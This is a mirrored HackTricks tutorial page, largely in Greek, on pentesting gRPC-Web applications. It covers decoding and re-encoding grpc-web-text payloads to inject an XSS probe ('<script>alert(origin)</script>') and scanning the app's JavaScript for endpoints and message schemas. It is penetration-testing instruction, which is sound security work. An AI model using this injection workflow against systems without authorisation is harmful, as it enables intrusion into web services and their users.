mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
161 lines
9 KiB
Markdown
161 lines
9 KiB
Markdown
# Pentesting gRPC-Web
|
||
|
||
{% hint style="success" %}
|
||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Support HackTricks</summary>
|
||
|
||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|
||
|
||
## **Manipulating gRPC-Web Payloads**
|
||
gRPC-Web χρησιμοποιεί Content-Type: `application/grpc-web-text` σε αιτήματα, το οποίο είναι μια μορφή protobuf σε κωδικοποιημένη μορφή base64. Μπορείτε να χρησιμοποιήσετε το εργαλείο [gprc-coder](https://github.com/nxenon/grpc-pentest-suite) και μπορείτε επίσης να εγκαταστήσετε την [Επέκταση Burp Suite](https://github.com/nxenon/grpc-pentest-suite).
|
||
|
||
### **Manual with gGRPC Coder Tool**
|
||
1. Πρώτα αποκωδικοποιήστε το payload:
|
||
```bash
|
||
echo "AAAAABYSC0FtaW4gTmFzaXJpGDY6BVhlbm9u" | python3 grpc-coder.py --decode --type grpc-web-text | protoscope > out.txt
|
||
```
|
||
2. Επεξεργαστείτε το περιεχόμενο του αποκωδικοποιημένου φορτίου
|
||
```
|
||
nano out.txt
|
||
2: {"Amin Nasiri Xenon GRPC"}
|
||
3: 54
|
||
7: {"<script>alert(origin)</script>"}
|
||
```
|
||
3. Κωδικοποιήστε το νέο payload
|
||
```bash
|
||
protoscope -s out.txt | python3 grpc-coder.py --encode --type grpc-web-text
|
||
```
|
||
4. Χρησιμοποιήστε την έξοδο στον Burp interceptor:
|
||
```
|
||
AAAAADoSFkFtaW4gTmFzaXJpIFhlbm9uIEdSUEMYNjoePHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+
|
||
```
|
||
### **Εγχειρίδιο με gRPC-Web Coder Burp Suite Extension**
|
||
Μπορείτε να χρησιμοποιήσετε το gRPC-Web Coder Burp Suite Extension στο [gRPC-Web Pentest Suite](https://github.com/nxenon/grpc-pentest-suite) που είναι πιο εύκολο. Μπορείτε να διαβάσετε τις οδηγίες εγκατάστασης και χρήσης στο αποθετήριο του.
|
||
|
||
## **Ανάλυση Αρχείων Javascript gRPC-Web**
|
||
Υπάρχει τουλάχιστον ένα αρχείο Javascript σε κάθε εφαρμογή gRPC-Web. Μπορείτε να αναλύσετε το αρχείο για να βρείτε νέα μηνύματα, endpoints και υπηρεσίες. Δοκιμάστε να χρησιμοποιήσετε το εργαλείο [gRPC-Scan](https://github.com/nxenon/grpc-pentest-suite).
|
||
1. Κατεβάστε το αρχείο Javascript gRPC-Web
|
||
2. Σαρώστε το με το grpc-scan.py:
|
||
```bash
|
||
python3 grpc-scan.py --file main.js
|
||
```
|
||
3. Αναλύστε την έξοδο και δοκιμάστε τα νέα endpoints και τις νέες υπηρεσίες:
|
||
```
|
||
Output:
|
||
Found Endpoints:
|
||
/grpc.gateway.testing.EchoService/Echo
|
||
/grpc.gateway.testing.EchoService/EchoAbort
|
||
/grpc.gateway.testing.EchoService/NoOp
|
||
/grpc.gateway.testing.EchoService/ServerStreamingEcho
|
||
/grpc.gateway.testing.EchoService/ServerStreamingEchoAbort
|
||
|
||
Found Messages:
|
||
|
||
grpc.gateway.testing.EchoRequest:
|
||
+------------+--------------------+--------------+
|
||
| Field Name | Field Type | Field Number |
|
||
+============+====================+==============+
|
||
| Message | Proto3StringField | 1 |
|
||
+------------+--------------------+--------------+
|
||
| Name | Proto3StringField | 2 |
|
||
+------------+--------------------+--------------+
|
||
| Age | Proto3IntField | 3 |
|
||
+------------+--------------------+--------------+
|
||
| IsAdmin | Proto3BooleanField | 4 |
|
||
+------------+--------------------+--------------+
|
||
| Weight | Proto3FloatField | 5 |
|
||
+------------+--------------------+--------------+
|
||
| Test | Proto3StringField | 6 |
|
||
+------------+--------------------+--------------+
|
||
| Test2 | Proto3StringField | 7 |
|
||
+------------+--------------------+--------------+
|
||
| Test3 | Proto3StringField | 16 |
|
||
+------------+--------------------+--------------+
|
||
| Test4 | Proto3StringField | 20 |
|
||
+------------+--------------------+--------------+
|
||
|
||
grpc.gateway.testing.EchoResponse:
|
||
+--------------+--------------------+--------------+
|
||
| Field Name | Field Type | Field Number |
|
||
+==============+====================+==============+
|
||
| Message | Proto3StringField | 1 |
|
||
+--------------+--------------------+--------------+
|
||
| Name | Proto3StringField | 2 |
|
||
+--------------+--------------------+--------------+
|
||
| Age | Proto3IntField | 3 |
|
||
+--------------+--------------------+--------------+
|
||
| IsAdmin | Proto3BooleanField | 4 |
|
||
+--------------+--------------------+--------------+
|
||
| Weight | Proto3FloatField | 5 |
|
||
+--------------+--------------------+--------------+
|
||
| Test | Proto3StringField | 6 |
|
||
+--------------+--------------------+--------------+
|
||
| Test2 | Proto3StringField | 7 |
|
||
+--------------+--------------------+--------------+
|
||
| Test3 | Proto3StringField | 16 |
|
||
+--------------+--------------------+--------------+
|
||
| Test4 | Proto3StringField | 20 |
|
||
+--------------+--------------------+--------------+
|
||
| MessageCount | Proto3IntField | 8 |
|
||
+--------------+--------------------+--------------+
|
||
|
||
grpc.gateway.testing.ServerStreamingEchoRequest:
|
||
+-----------------+-------------------+--------------+
|
||
| Field Name | Field Type | Field Number |
|
||
+=================+===================+==============+
|
||
| Message | Proto3StringField | 1 |
|
||
+-----------------+-------------------+--------------+
|
||
| MessageCount | Proto3IntField | 2 |
|
||
+-----------------+-------------------+--------------+
|
||
| MessageInterval | Proto3IntField | 3 |
|
||
+-----------------+-------------------+--------------+
|
||
|
||
grpc.gateway.testing.ServerStreamingEchoResponse:
|
||
+------------+-------------------+--------------+
|
||
| Field Name | Field Type | Field Number |
|
||
+============+===================+==============+
|
||
| Message | Proto3StringField | 1 |
|
||
+------------+-------------------+--------------+
|
||
|
||
grpc.gateway.testing.ClientStreamingEchoRequest:
|
||
+------------+-------------------+--------------+
|
||
| Field Name | Field Type | Field Number |
|
||
+============+===================+==============+
|
||
| Message | Proto3StringField | 1 |
|
||
+------------+-------------------+--------------+
|
||
|
||
grpc.gateway.testing.ClientStreamingEchoResponse:
|
||
+--------------+----------------+--------------+
|
||
| Field Name | Field Type | Field Number |
|
||
+==============+================+==============+
|
||
| MessageCount | Proto3IntField | 1 |
|
||
+--------------+----------------+--------------+
|
||
```
|
||
## Αναφορές
|
||
|
||
* [Hacking into gRPC-Web Article by Amin Nasiri](https://infosecwriteups.com/hacking-into-grpc-web-a54053757a45)
|
||
* [gRPC-Web Pentest Suite](https://github.com/nxenon/grpc-pentest-suite)
|
||
|
||
{% hint style="success" %}
|
||
Μάθετε & εξασκηθείτε στο AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
Μάθετε & εξασκηθείτε στο GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>Υποστήριξη HackTricks</summary>
|
||
|
||
* Ελέγξτε τα [**σχέδια συνδρομής**](https://github.com/sponsors/carlospolop)!
|
||
* **Εγγραφείτε στην** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
* **Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
||
</details>
|
||
{% endhint %}
|